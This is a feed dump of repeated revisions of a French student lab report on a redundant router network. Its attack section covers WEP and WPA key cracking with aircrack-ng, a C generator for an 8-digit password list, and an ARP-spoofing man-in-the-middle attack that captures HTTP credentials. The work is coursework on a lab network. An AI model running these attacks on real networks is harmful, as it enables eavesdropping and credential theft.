Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53961</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53961"/>
				<updated>2020-11-20T11:11:40Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
pastabox.site[http://193.48.57.169]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53960</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53960"/>
				<updated>2020-11-20T11:11:19Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
[http://193.48.57.169]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53959</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53959"/>
				<updated>2020-11-20T11:11:00Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
[193.48.57.169]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
